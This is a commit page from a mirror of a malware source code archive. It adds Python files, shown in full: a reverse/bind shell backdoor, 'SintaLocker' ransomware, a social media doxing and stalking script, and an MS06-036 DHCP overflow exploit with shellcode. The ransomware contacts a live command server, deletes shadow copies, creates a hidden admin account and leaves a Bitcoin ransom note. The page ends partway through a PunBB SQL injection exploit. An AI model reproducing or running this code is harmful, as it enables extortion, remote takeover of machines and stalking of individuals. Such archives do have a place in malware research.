Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity

Add files via upload

This commit is contained in:
vxunderground 2020-10-09 22:09:52 -05:00 committed by GitHub
parent f5ec68af9b
commit 9cbdb38457
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
17 changed files with 2998 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Python/AngstStealer.7z Normal file
View File

Binary file not shown.

BIN
Python/Aris.7z Normal file
View File

Binary file not shown.

121
Python/Backdoor.Python.RShell Normal file
View File

@ -0,0 +1,121 @@
#!/usr/bin/env python
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
# #
# alpha #
# #
# #
# usage: #
# % ./d00r -b password port #
# % ./d00r -r password port host #
# % nc host port #
# % nc -l -p port (please use netcat) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import os, sys, socket, time
# =================== var =======
MAX_LEN=1024
SHELL="/bin/zsh -c"
TIME_OUT=300 #s
PW=""
PORT=""
HOST=""
# =================== funct =====
# shell - exec command, return stdout, stderr; improvable
def shell(cmd):
sh_out=os.popen(SHELL+" "+cmd).readlines()
nsh_out=""
for i in range(len(sh_out)):
nsh_out+=sh_out[i]
return nsh_out
# action?
def action(conn):
conn.send("\nPass?\n")
try: pw_in=conn.recv(len(PW))
except: print "timeout"
else:
if pw_in == PW:
conn.send("j00 are on air!\n")
while True:
conn.send(">>> ")
try:
pcmd=conn.recv(MAX_LEN)
except:
print "timeout"
return True
else:
#print "pcmd:",pcmd
cmd=""#pcmd
for i in range(len(pcmd)-1):
cmd+=pcmd[i]
if cmd==":dc":
return True
elif cmd==":sd":
return False
else:
if len(cmd)>0:
out=shell(cmd)
conn.send(out)
# =================== main ======
argv=sys.argv
if len(argv)<4:
print "error; help: head -n 16 d00r.py"
sys.exit(1)
elif argv[1]=="-b":
PW=argv[2]
PORT=argv[3]
elif argv[1]=="-r" and len(argv)>4:
PW=argv[2]
PORT=argv[3]
HOST=argv[4]
else: exit(1)
PORT=int(PORT)
print "PW:",PW,"PORT:",PORT,"HOST:",HOST
#sys.argv[0]="d00r"
# exit father proc
if os.fork()!=0:
sys.exit(0)
# associate the socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if argv[1]=="-b":
sock.bind(('localhost', PORT))
sock.listen(0)
run=True
while run:
if argv[1]=="-r":
try: sock.connect( (HOST, PORT) )
except:
print "host unreachable"
time.sleep(5)
else: run=action(sock)
else:
try: (conn,addr)=sock.accept()
except:
print "timeout"
time.sleep(1)
else: run=action(conn)
# shutdown the sokcet
if argv[1]=="-b": conn.shutdown(2)
else:
try: sock.send("")
except: time.sleep(1)
else: sock.shutdown(2)

463
Python/CryPy_Source.py Normal file
View File

@ -0,0 +1,463 @@
import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2
import SintaRegistery
import SintaChangeWallpaper
from Crypto import Random
from Crypto.Cipher import AES
rmsbrand = 'SintaLocker'
newextns = 'sinta'
encfolder = '__SINTA I LOVE YOU__'
email_con = 'sinpayy@yandex.com'
btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1'
userhome = os.path.expanduser('~')
my_server = 'http://www.dobrebaseny.pl/js/lib/srv/'
wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg'
victim_info = base64.b64encode(str(platform.uname()))
configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname()))
glob_config = None
try:
glob_config = json.loads(urllib.urlopen(configurl).read())
if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']):
raise Exception('0x00001')
except IOError:
time.sleep(1)
victim_id = glob_config[u'MRU_ID']
victim_r = glob_config[u'MRU_UDP']
victim_s = glob_config[u'MRU_PDP']
try:
os.system('bcdedit /set {default} recoveryenabled No')
os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f')
except WindowsError:
pass
def setWallpaper(imageUrl):
try:
wallpaper = SintaChangeWallpaper.ChangeWallpaper()
wallpaper.downloadWallpaper(imageUrl)
except:
pass
def persistance():
try:
SintaRegistery.addRegistery(os.path.realpath(__file__))
except:
pass
def destroy_shadow_copy():
try:
os.system('vssadmin Delete Shadows /All /Quiet')
except:
pass
def create_remote_desktop():
try:
os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f')
os.system('net user ' + victim_r + ' ' + victim_s + ' /add')
os.system('net localgroup administrators ' + victim_r + ' /add')
except:
pass
def write_instruction(dir, ext):
try:
files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w')
files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '')
except:
pass
def delete_file(filename):
try:
os.remove(filename)
except:
pass
def find_files(root_dir):
write_instruction(root_dir, 'md')
extentions = ['*.txt',
'*.exe',
'*.php',
'*.pl',
'*.7z',
'*.rar',
'*.m4a',
'*.wma',
'*.avi',
'*.wmv',
'*.csv',
'*.d3dbsp',
'*.sc2save',
'*.sie',
'*.sum',
'*.ibank',
'*.t13',
'*.t12',
'*.qdf',
'*.gdb',
'*.tax',
'*.pkpass',
'*.bc6',
'*.bc7',
'*.bkp',
'*.qic',
'*.bkf',
'*.sidn',
'*.sidd',
'*.mddata',
'*.itl',
'*.itdb',
'*.icxs',
'*.hvpl',
'*.hplg',
'*.hkdb',
'*.mdbackup',
'*.syncdb',
'*.gho',
'*.cas',
'*.svg',
'*.map',
'*.wmo',
'*.itm',
'*.sb',
'*.fos',
'*.mcgame',
'*.vdf',
'*.ztmp',
'*.sis',
'*.sid',
'*.ncf',
'*.menu',
'*.layout',
'*.dmp',
'*.blob',
'*.esm',
'*.001',
'*.vtf',
'*.dazip',
'*.fpk',
'*.mlx',
'*.kf',
'*.iwd',
'*.vpk',
'*.tor',
'*.psk',
'*.rim',
'*.w3x',
'*.fsh',
'*.ntl',
'*.arch00',
'*.lvl',
'*.snx',
'*.cfr',
'*.ff',
'*.vpp_pc',
'*.lrf',
'*.m2',
'*.mcmeta',
'*.vfs0',
'*.mpqge',
'*.kdb',
'*.db0',
'*.mp3',
'*.upx',
'*.rofl',
'*.hkx',
'*.bar',
'*.upk',
'*.das',
'*.iwi',
'*.litemod',
'*.asset',
'*.forge',
'*.ltx',
'*.bsa',
'*.apk',
'*.re4',
'*.sav',
'*.lbf',
'*.slm',
'*.bik',
'*.epk',
'*.rgss3a',
'*.pak',
'*.big',
'*.unity3d',
'*.wotreplay',
'*.xxx',
'*.desc',
'*.py',
'*.m3u',
'*.flv',
'*.js',
'*.css',
'*.rb',
'*.png',
'*.jpeg',
'*.p7c',
'*.p7b',
'*.p12',
'*.pfx',
'*.pem',
'*.crt',
'*.cer',
'*.der',
'*.x3f',
'*.srw',
'*.pef',
'*.ptx',
'*.r3d',
'*.rw2',
'*.rwl',
'*.raw',
'*.raf',
'*.orf',
'*.nrw',
'*.mrwref',
'*.mef',
'*.erf',
'*.kdc',
'*.dcr',
'*.cr2',
'*.crw',
'*.bay',
'*.sr2',
'*.srf',
'*.arw',
'*.3fr',
'*.dng',
'*.jpeg',
'*.jpg',
'*.cdr',
'*.indd',
'*.ai',
'*.eps',
'*.pdf',
'*.pdd',
'*.psd',
'*.dbfv',
'*.mdf',
'*.wb2',
'*.rtf',
'*.wpd',
'*.dxg',
'*.xf',
'*.dwg',
'*.pst',
'*.accdb',
'*.mdb',
'*.pptm',
'*.pptx',
'*.ppt',
'*.xlk',
'*.xlsb',
'*.xlsm',
'*.xlsx',
'*.xls',
'*.wps',
'*.docm',
'*.docx',
'*.doc',
'*.odb',
'*.odc',
'*.odm',
'*.odp',
'*.ods',
'*.odt',
'*.sql',
'*.zip',
'*.tar',
'*.tar.gz',
'*.tgz',
'*.biz',
'*.ocx',
'*.html',
'*.htm',
'*.3gp',
'*.srt',
'*.cpp',
'*.mid',
'*.mkv',
'*.mov',
'*.asf',
'*.mpeg',
'*.vob',
'*.mpg',
'*.fla',
'*.swf',
'*.wav',
'*.qcow2',
'*.vdi',
'*.vmdk',
'*.vmx',
'*.gpg',
'*.aes',
'*.ARC',
'*.PAQ',
'*.tar.bz2',
'*.tbk',
'*.bak',
'*.djv',
'*.djvu',
'*.bmp',
'*.cgm',
'*.tif',
'*.tiff',
'*.NEF',
'*.cmd',
'*.class',
'*.jar',
'*.java',
'*.asp',
'*.brd',
'*.sch',
'*.dch',
'*.dip',
'*.vbs',
'*.asm',
'*.pas',
'*.ldf',
'*.ibd',
'*.MYI',
'*.MYD',
'*.frm',
'*.dbf',
'*.SQLITEDB',
'*.SQLITE3',
'*.asc',
'*.lay6',
'*.lay',
'*.ms11 (Security copy)',
'*.sldm',
'*.sldx',
'*.ppsm',
'*.ppsx',
'*.ppam',
'*.docb',
'*.mml',
'*.sxm',
'*.otg',
'*.slk',
'*.xlw',
'*.xlt',
'*.xlm',
'*.xlc',
'*.dif',
'*.stc',
'*.sxc',
'*.ots',
'*.ods',
'*.hwp',
'*.dotm',
'*.dotx',
'*.docm',
'*.DOT',
'*.max',
'*.xml',
'*.uot',
'*.stw',
'*.sxw',
'*.ott',
'*.csr',
'*.key',
'wallet.dat']
for dirpath, dirs, files in os.walk(root_dir):
if 'Windows' not in dirpath:
for basename in files:
for ext in extentions:
if fnmatch.fnmatch(basename, ext):
filename = os.path.join(dirpath, basename)
yield filename
def make_directory(file_path):
directory = file_path + '' + encfolder
if not os.path.exists(directory):
try:
os.makedirs(directory)
except:
pass
def text_generator(size = 6, chars = string.ascii_uppercase + string.digits):
return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns
def generate_file(file_path, filename):
make_directory(file_path)
key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])
newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm')
try:
encrypt_file(key, filename, newfilename)
except:
pass
def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16):
if not out_filename:
out_filename = newfilename
iv = ''.join((chr(random.randint(0, 255)) for i in range(16)))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
listdir = (userhome + '\\Contacts\\',
userhome + '\\Documents\\',
userhome + '\\Downloads\\',
userhome + '\\Favorites\\',
userhome + '\\Links\\',
userhome + '\\My Documents\\',
userhome + '\\My Music\\',
userhome + '\\My Pictures\\',
userhome + '\\My Videos\\',
'D:\\',
'E:\\',
'F:\\',
'G:\\',
'I:\\',
'J:\\',
'K:\\',
'L:\\',
'M:\\',
'N:\\',
'O:\\',
'P:\\',
'Q:\\',
'R:\\',
'S:\\',
'T:\\',
'U:\\',
'V:\\',
'W:\\',
'X:\\',
'Y:\\',
'Z:\\')
for dir_ in listdir:
for filename in find_files(dir_):
generate_file(dir_, filename)
delete_file(filename)
persistance()
destroy_shadow_copy()
create_remote_desktop()
write_instruction(userhome + '\\Desktop\\', 'txt')
os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt')
setWallpaper(wallpaper_link)

336
Python/Doxing-Script-Py3.py Normal file
View File

@ -0,0 +1,336 @@
import os
import requests
import sys
import subprocess
import re
import face_recognition
import json
done_checks = []
social_media = []
usernames = []
emails = []
twitter = []
instagram = []
steam = []
urls = []
urls_stalk = []
urls_done = []
name = ""
adresse = ""
compare = False
first_dl = False
def stalk(user):
if len(user) > 1:
global urls_stalk
pastebin_url = "https://pastebin.com/u/" + user
pastebin_str = "s Pastebin - Pastebin.com"
patreon_url = "https://www.patreon.com/" + user
patreon_str = 'created_at'
gutefrage_url = "https://www.gutefrage.net/nutzer/" + user
gutefrage_str = '<meta name="title" content="Profil von'
ebay_url = "https://www.ebay.de/usr/" + user
ebay_str = '<span>Angemeldet seit: </span>'
twitter_url = "https://twitter.com/" + user
twitter_str = '<link rel="canonical" href="https://twitter.com/' + user + '">'
facebook_url = 'https://facebook.com/' + user
facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user
instagram_url = "https://www.instagram.com/" + user + "/"
instagram_str = '<link rel="alternate" href="https://www.instagram.com/' + user + '/?hl=en" hreflang="en" />'
steam_url = "https://steamcommunity.com/id/" + user
steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif'
twitch_url = "https://www.twitch.tv/" + user
twitch_str = "content='twitch://stream/" + user
lachschon_url = "https://www.lachschon.de/community/user/" + user + "/"
lachschon_str = '<label>Rang</label>'
URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url]
STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str]
for i in range(0, len(URLS)):
html = getResponse(URLS[i])
if STRS[i].lower() in str(html).lower():
print("\t> " + URLS[i])
urls_stalk.append(URLS[i])
def get_twitter_img(user):
url = "https://twitter.com/" + user
html = subprocess.getoutput("phantomjs html.js " + url)
image = find_between(html, '<img class="ProfileAvatar-image " src="', '" alt="')
r = requests.get(image)
with open('Twitter.jpg', 'wb') as f:
f.write(r.content)
def get_instagram_img(user):
data = {
'username': user,
'submit': 'View DP'
}
response = requests.post('https://fullinstadp.com/index.php', data=data)
html = response.text
f = open("Out.html", "w")
f.write(html)
f.close
img_url = find_between(html, '<img class="loading img-rounded center-block img-responsive" src="', '" alt=""')
r = requests.get(img_url)
with open('Instagram.jpg', 'wb') as f:
f.write(r.content)
def check_mail(string):
EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
if EMAIL_REGEX.match(string):
return True
else:
return False
def check_string_mail(string):
global emails
splitted = string.split(" ")
for word in splitted:
if check_mail(word):
emails.append(word)
def check_string_url(string):
global urls
for word in string.split(" "):
try:
url = re.search("(?P<url>https?://[^\s]+)", word).group("url")
if '//t.co/' in url:
last = url[-1:]
if last == ".":
url = url.rstrip('.')
r = requests.get(url)
url = r.url
urls.append(url)
except:
e = ""
def check_string_socialmedia(string):
global social_media
count = 0
next = 0
for word in string.split(" "):
next = count + 2
if 'facebook' in word.lower():
print(string.split(" ")[next])
count +=1
def youtube(url):
url = url + "/about"
html = subprocess.getoutput("phantomjs html.js " + url)
tmp_str = html.split('"}},"urlEndpoint":')
for url in tmp_str:
#print(url)
url = find_between(url, '{"url":"', '","target":')
print(html)
def grab_instagram(profile):
global done_checks
global urls
global instagram
global usernames
global compare
if not "instagram: " + profile in done_checks:
if not profile in usernames:
usernames.append(profile)
url = "https://www.instagram.com/" + profile + "/"
html = subprocess.getoutput("phantomjs html.js " + url)
if '"@type":"Person","name":"' in html:
display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"')
if not display_name in usernames:
usernames.append(display_name)
if not "instagram: " + display_name in done_checks:
print(display_name)
stalk(display_name)
instagram.append("Display Name: " + display_name)
description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer')
follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer')
check_string_mail(description)
check_string_url(description)
instagram.append("Description: " + description)
instagram.append("Follower: " + follower)
#get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion
compare = True
if not "instagram: " + profile in done_checks:
done_checks.append("instagram: " + profile)
def grab_steam(url):
global done_checks
global urls
global usernames
if not "steam: " + profile in done_checks:
url = url + "/ajaxaliases/"
response = requests.get(url)
html = response.text
for item in html.split("newname"):
username = find_between(item, '":"', '","timechanged')
if not username in usernames:
usernames.append(username)
def grab_twitter(profile):
global done_checks
global urls
global adresse
global usernames
global twitter
global first_dl
if not "twitter: " + profile in done_checks:
url = "https://twitter.com/" + profile
urls.append(url)
html = subprocess.getoutput("phantomjs html.js " + url)
#variables
display_name = find_between(html, '<title>', ' (@')
if not profile in usernames:
usernames.append(profile)
if not display_name in usernames:
usernames.append(display_name)
if not "twitter: " + display_name in done_checks:
print(display_name)
stalk(display_name)
join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten')
description = ""
url = ""
location = ""
#if
if '<meta name="description"' in html:
description = find_between(html, '<meta name="description" content="', '">')
description = description.replace("&quot", "")
check_string_mail(description)
check_string_url(description)
if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html:
tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>')
url = find_between(tmp, '" title="', '">')
urls.append(url)
if 'location&quot;:&quot;' in html:
location = find_between(html, '&quot;location&quot;:&quot;', '&quot;,&quot;url')
if len(location) > 0:
adresse = location
twitter.append("Display Name: " + display_name)
twitter.append("Join Date: " + join_date)
twitter.append("Description: " + description)
twitter.append("URL: " + url)
twitter.append("Location: " + location)
twitter.append(" ")
#if first_dl == False:
#get_twitter_img(profile)
#first_dl = True
if not "twitter: " + profile in done_checks:
done_checks.append("twitter: " + profile)
def handle():
try:
if sys.argv[1]:
social_media = sys.argv[1].lower()
if sys.argv[2]:
info_type = sys.argv[2].lower()
if sys.argv[3]:
infos = sys.argv[3].lower()
if info_type == "url":
if social_media == "youtube":
youtube(infos)
elif info_type == "profile":
if social_media == "twitter":
grab_twitter(infos)
elif info_type == "user":
if social_media == "stalk":
stalk(infos)
except Exception as e:
print(e)
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def getResponse(url):
response = requests.get(url)
#response.raise_for_status()
data = response.content
return data
handle()
for url in urls_stalk:
#print(url)
if 'twitter.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "twitter: " + profile:
checked = True
if not checked:
grab_twitter(profile)
done_checks.append("twitter:" + profile)
if 'instagram.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "instagram: " + profile:
checked = True
if not checked:
grab_instagram(profile)
#print("Download Profile Picture")
done_checks.append("instagram: " + profile)
#Steam Check direkt in der Stalk Funktion
if 'steamcommunity.com' in url:
checked = False
profile = url.split("/")[4]
for check in done_checks:
if check == "steam: " + profile:
checked = True
if not checked:
grab_steam(url)
done_checks.append("steam: " + profile)
print("------------------")
print("Usernames:")
print("------------------")
for user in usernames:
print(user)
stalk(user)
if len(urls) > 0:
print("------------------")
print("URLs:")
print("------------------")
for url in urls:
print(url)
if len(twitter) > 0:
print("------------------")
print("Twitter:")
print("------------------")
for item in twitter:
print(item)
if len(instagram) > 0:
print("------------------")
print("Instagram:")
print("------------------")
for item in instagram:
print(item)
if len(steam) > 0:
print("------------------")
print("Steam:")
print("------------------")
for item in steam:
print(item)
print("------------------")
print("Sites checked:")
print("------------------")
for check in done_checks:
print(check)

237
Python/Exploit.Python.Ms06-036.a Normal file
View File

@ -0,0 +1,237 @@
#!/usr/bin/env python
#
#
# by redsand@blacksecurity.org
# this (like any thing) would not be possible w/out the bl4ck team.
# thanks guys.
#
import sys, os
sys.path.append("pydhcplib")
from scapy import *
from pydhcplib.dhcp_packet import *
from pydhcplib.dhcp_network import *
from pydhcplib.type_strlist import *
from pydhcplib.type_ipv4 import *
from pydhcplib.type_hw_addr import *
inet_face = "vmnet8"
default_ip = "10.31.33.7"
# user bl4ck/bl4ck
# this exits via Thread (so thta we kill the dhcp thread in services.exe
#
# this means if services doesn't crash, it was a successful exploit
#
scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
netopt = {'client_listen_port':"68",
'server_listen_port':"67",
'listen_address':"0.0.0.0"}
def substr(i,o,off):
begin=i[:off]
end=i[off+len(o):]
ret=begin+o+end
return ret
def io(i):
str=""
a=chr(i % 256)
i=i >> 8
b=chr(i % 256)
i=i >> 8
c=chr(i % 256)
i=i >> 8
d=chr(i % 256)
str+="%c%c%c%c" % (a,b,c,d)
return str
class Server(DhcpServer):
def __init__(self, options):
DhcpServer.__init__(self,options["listen_address"],
options["client_listen_port"],
options["server_listen_port"])
def HandleDhcpDiscover(self, packet):
my_reqip = ''
my_reqip = default_ip
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received discover from %s (%s)" % (mymac,my_reqip)
mpacket = DhcpPacket()
mpacket.CreateDhcpOfferPacketFrom(packet)
mpacket.SetOption("dhcp_message_type",[2])
mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
mpacket.SetOption("siaddr", ipv4(server_ip).list())
mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
mpacket.SetOption("flags",[0,0])
mpacket.SetOption("server_identifier", ipv4(server_ip).list())
mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
mpacket.SetOption("router",ipv4(our_ip).list())
mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')
print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
sendp(p, iface=inet_face, verbose=False)
def HandleDhcpRequest(self, packet):
ip = packet.GetOption("request_ip_address")
sid = packet.GetOption("server_identifier")
ciaddr = packet.GetOption("ciaddr")
my_reqip = ''
try:
data = packet.options_data['request_ip_address']
for i in range(0,len(data),4) :
if len(data[i:i+4]) == 4 :
my_reqip += ipv4(data[i:i+4]).str()
except:
my_reqip = default_ip
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received request from %s (%s)" % (my_reqip,mymac)
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mypacket = DhcpPacket()
mypacket.CreateDhcpAckPacketFrom(packet)
mypacket.SetOption("yiaddr", ipv4(my_reqip).list())
dumbstr = "\x90" * 0xFF
# we're looking for a jmp/call ebx ?! or landing in our codespace
# directly
# C5 converts to 253C
# BB = 2557
# AA = 00AC
# DD = 258C
# EE = 03B5
# 88 = 00D6
# 99 = 00EA
# F3 = 2591
# B0 = 2264
# 8F = 00c5
eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
#eipstr = "C" * 0xFF
payload = "\x42" * 0xFF
payload = substr(payload, scode, 1)
## find location in heap to ret2
# find offset & append as many "\x26\x6e\x43\x6e"
# to increment ebx to a non trashed location (since ebx points to our code)
# then push ebx \x53 and \xc4 (retn)
#
# we're looking for a pop+pop+ret or a jmp/call ebx to return to our
# unicode filtered input
# note it must be iwthin the bounds of 0x0000**** - 0x0070****
# or 0x22***** <-- wont help us
append = "\x0f\xff" + ( "\x90" * 0xff )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( payload[0:254]) + "\x00"
print "Length of our attack: %r" % len(append)
eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
for i in p:
sendp(eth/i, iface=inet_face, verbose=False)
def HandleDhcpDecline(self, packet):
return
#print "** Dhcp Declined"
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpRelease(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpInform(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
print "\t by redsand@blacksecurity.org"
print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
print ""
if len(sys.argv) > 1:
inet_face = sys.argv[1]
if len(sys.argv) > 2:
default_ip = sys.argv[2]
print "Listening for client requests:\n"
print "Listening on interface: %s" % inet_face
print "Using default address: %s" % default_ip
server = Server(netopt)
while True :
server.GetNextDhcpPacket()

130
Python/Exploit.Python.PunBB.a Normal file
View File

@ -0,0 +1,130 @@
#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import urllib
import getopt
import sys
import string
__argv__ = sys.argv
def banner():
print "PunBB 1.2.4 - change_email SQL injection exploit"
print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage():
banner()
print "Usage:\n"
print " $ ./punbb_change_email.py [options]\n"
print " -h http_url url of the punBB forum to exploit"
print " f.e. http://www.forum.net/punBB/"
print " -u username punBB forum useraccount"
print " -p password punBB forum userpassword"
print " -e email email address where the admin leve activation email is sent"
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
print ""
sys.exit(-1)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
except getopt.GetoptError:
usage()
if len(__argv__) < 10:
usage()
username = None
password = None
email = None
domain = None
host = None
for o, arg in opts:
if o == "-h":
host = arg
if o == "-u":
username = arg
if o == "-p":
password = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg
# Printout banner
banner()
# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)
if username == None:
print "[-] username needed to continue"
sys.exit(-1)
if password == None:
print "[-] password needed to continue"
sys.exit(-1)
if email == None:
print "[-] email address needed to continue"
